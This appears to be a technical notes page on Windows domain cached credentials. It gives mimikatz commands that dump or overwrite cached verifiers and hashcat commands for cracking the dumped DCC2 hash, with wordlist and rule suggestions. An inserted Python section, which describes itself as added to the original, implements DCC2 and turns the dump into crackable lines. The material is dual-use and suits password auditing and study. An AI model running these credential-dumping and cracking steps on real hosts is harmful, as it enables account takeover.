Cached domain credentials can be modified with mimikatz's /kiwi switch [1]:
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::cache /user:user-to-modify /password:new-password /kiwi
While logging in with the reset password works, data secured by DPAPI (Data Protection API) is inaccessible after the change [2,3]. Programs that leverage DPAPI include EFS, Microsoft Outlook, Windows Live Mail, and Google Chrome, among others (though notably not Mozilla Firefox) [4,5].
Rather than replacing domain cached credentials, recovering the original password by cracking the cached hash may be possible (the cached value is a one-way verifier, so it is cracked rather than decrypted):
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::cache
...
* Iteration is set to default (10240)
...
[NL$1 - 2/23/2013 4:48:29 PM]
RID       : 0000045a (1114)
User      : MYDOMAIN\jsmith
MsCacheV2 : e4e4e18ac7d15990f64ebe1be1989d9f
Saved to hash.txt in hashcat's DCC2 format ($DCC2$iterations#username#hash):
$DCC2$10240#jsmith#e4e4e18ac7d15990f64ebe1be1989d9f
$ git clone https://github.com/hashcat/hashcat.git
$ cd hashcat/
$ make
$ hashcat -a 0 -m 2100 --status -o found.txt hash.txt rocktastic.txt
-a 0 = set attack mode to straight / dictionary attack
-m 2100 = set hash mode to "Domain Cached Credentials 2 (DCC2), MS Cache 2"
--status = automatically update the status screen
-o found.txt = write recovered passwords to found.txt
hash.txt = the hash saved above in $DCC2$ format
rocktastic.txt = Rocktastic: "a word list on steroids" [7]
Status...........: Cracked
Hash.Type........: Domain Cached Credentials 2 (DCC2), MS Cache 2
Hash.Target......: $DCC2$10240#jsmith#e4e4e18ac7d15990f64ebe1be1989d9f
...
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
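To make the two steps above concrete (turning the lsadump::cache fields into the $DCC2$ line, and what hashcat mode 2100 actually computes for each candidate), here is an added Python example; it is not code from the original post, from mimikatz or from hashcat. It implements the MS Cache 2 verifier as publicly documented (DCC1 = MD4(NT-hash || UTF-16LE(lowercased user)); DCC2 = PBKDF2-HMAC-SHA1 over DCC1 with the user as salt, 10240 iterations by default, 16-byte output), reads the iteration count and user/digest pairs out of a constructed copy of the mimikatz output shown above, and checks a single candidate password against a $DCC2$ line the way a password audit would. MD4 is implemented in pure Python because hashlib.new("md4") is unavailable on OpenSSL 3 builds without the legacy provider. The account "Auditor" and its password are constructed sample values.

```python
from __future__ import annotations
import hashlib
import hmac
import re
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320), pure Python; hashlib may lack md4 on OpenSSL 3."""
    def rotl(x: int, n: int) -> int:
        return ((x << n) | (x >> (32 - n))) & MASK

    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z

    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = list(struct.unpack("<16I", msg[off:off + 64]))
        s = [a, b, c, d]
        for i in range(16):                          # round 1
            t = (-i) % 4
            x, y, z = s[(t + 1) % 4], s[(t + 2) % 4], s[(t + 3) % 4]
            s[t] = rotl((s[t] + F(x, y, z) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
        for i in range(16):                          # round 2
            t = (-i) % 4
            x, y, z = s[(t + 1) % 4], s[(t + 2) % 4], s[(t + 3) % 4]
            k = (i % 4) * 4 + i // 4
            s[t] = rotl((s[t] + G(x, y, z) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
        for i in range(16):                          # round 3
            t = (-i) % 4
            x, y, z = s[(t + 1) % 4], s[(t + 2) % 4], s[(t + 3) % 4]
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
            s[t] = rotl((s[t] + H(x, y, z) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
        a, b, c, d = [(v + w) & MASK for v, w in zip((a, b, c, d), s)]
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash: MD4 over the UTF-16LE encoded password."""
    return md4(password.encode("utf-16le"))


def dcc2(username: str, password: str, iterations: int = 10240) -> bytes:
    """MS Cache 2 / DCC2 verifier, the value hashcat mode 2100 recomputes per candidate.
    The iteration count is what makes each guess roughly 10240x the cost of a DCC1 guess."""
    user = username.lower().encode("utf-16le")       # username is case-folded before use
    dcc1 = md4(nt_hash(password) + user)             # MS Cache 1 value
    return hashlib.pbkdf2_hmac("sha1", dcc1, user, iterations, dklen=16)


def hashcat_line(username: str, password: str, iterations: int = 10240) -> str:
    """Build the $DCC2$<iterations>#<user>#<hex> line for a known account (audit fixture)."""
    return f"$DCC2${iterations}#{username.lower()}#{dcc2(username, password, iterations).hex()}"


# Constructed copy of the lsadump::cache output shown in the post (same domain, user, digest).
SAMPLE_CACHE_OUTPUT = """\
* Iteration is set to default (10240)

[NL$1 - 2/23/2013 4:48:29 PM]
RID       : 0000045a (1114)
User      : MYDOMAIN\\jsmith
MsCacheV2 : e4e4e18ac7d15990f64ebe1be1989d9f
"""


def cache_output_to_hashcat_lines(text: str) -> list[str]:
    """Read the iteration count and every User/MsCacheV2 pair; emit $DCC2$ lines."""
    m = re.search(r"Iteration is set to \w+ \((\d+)\)", text)
    iterations = int(m.group(1)) if m else 10240
    pairs = re.findall(r"User\s*:\s*(?:[^\\\s]+\\)?(\S+)\s+MsCacheV2\s*:\s*([0-9a-fA-F]{32})", text)
    return [f"$DCC2${iterations}#{user}#{digest.lower()}" for user, digest in pairs]


def parse_hashcat_line(line: str) -> tuple[int, str, bytes]:
    m = re.fullmatch(r"\$DCC2\$(\d+)#([^#]+)#([0-9a-fA-F]{32})", line.strip())
    if not m:
        raise ValueError(f"not a DCC2 line: {line!r}")
    return int(m.group(1)), m.group(2), bytes.fromhex(m.group(3))


def check_candidate(line: str, password: str) -> bool:
    """True if the candidate password reproduces the cached verifier in `line`."""
    iterations, user, digest = parse_hashcat_line(line)
    return hmac.compare_digest(dcc2(user, password, iterations), digest)


if __name__ == "__main__":
    print(cache_output_to_hashcat_lines(SAMPLE_CACHE_OUTPUT)[0])
    fixture = hashcat_line("Auditor", "Winter2019!")   # constructed account and password
    print(fixture)
    print("matches:", check_candidate(fixture, "Winter2019!"), check_candidate(fixture, "winter2019!"))
```

The parser honours the "Iteration is set to ..." line rather than assuming 10240, since a host with a non-default count produces a different verifier and a $DCC2$ line with the wrong count will never match. Because every guess costs a full PBKDF2 run, the practical defence the rest of this page implies is password strength: a cached verifier for a password that appears in a common wordlist (with or without the rule files mentioned below) falls in seconds regardless of the iteration count.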
"Utilities exist that can help overwrite the cached verifier. By using one of these utilities, an attacker can authenticate by using the overwritten value. ... Overwriting the password does not help an attacker replace the verifier, because the base keying material is incorrect. Therefore, data that is encrypted by using Encrypting File System or by using the Data Protection API (DPAPI) will not decrypt." —Cached credentials security in Windows Server 2003, in Windows XP, and in Windows 2000
"Even though someone overrides Cached Logon Data, this person is not able to get access to our data protection API protected data." —Cached Credentials: Important Facts That You Cannot Miss
"On Windows, Chrome encrypts the passwords with Windows DPAPI, which can be decrypted by any program running as the Windows user, unless the user's logon password is forcibly reset." —Comment by Ben N on Information Security
"Chrome and IE use DPAPI for secrets, Firefox just uses a plaintext master key file since Mozilla is too cool for Windows." —Tweet by SwiftOnSecurity
For better cracking performance, pair your wordlist with a high-quality basic rules file. Release the Kraken: Starting Your Password Cracking Journey suggests append_d.rule (adds numbers to the end of a password), append_s.rule (adds special characters to the end of a password), and leetspeak.rule (changes passwords to leetspeak).
See also breachcompilation.txt and Weakpass 2.0.
Dumping Windows Credentials: "Cached Domain Credentials. These are the password hashes of domain users that have logged on to the host previously. Crack them using JtR or hashcat. Remember to specify the right format, which is either mscash (xp, w2k3) or mscash2 (vista, w7, w2k8 …). Note that you can’t perform 'pass-the-hash' style attacks with this type of hash."
MSCash2 Algorithm (includes sample code for generating v2 Domain Cached Credentials): "Domain cached credentials (DCC) are cached domain logon information that are stored locally in the Windows registry of Windows operating systems (cf. MSCash Algorithm). With the release of the Windows Vista operating system, Microsoft introduced a new hash algorithm for generating these Domain Cached Credentials. This new algorithm increased the cost of password guessing attacks by several orders of magnitude."
Passcape's Reset Windows Password can reset or change domain cached passwords and its Network Password Recovery Wizard may recover domain cached passwords.
created: 2019.01.29, updated: 2019.02.05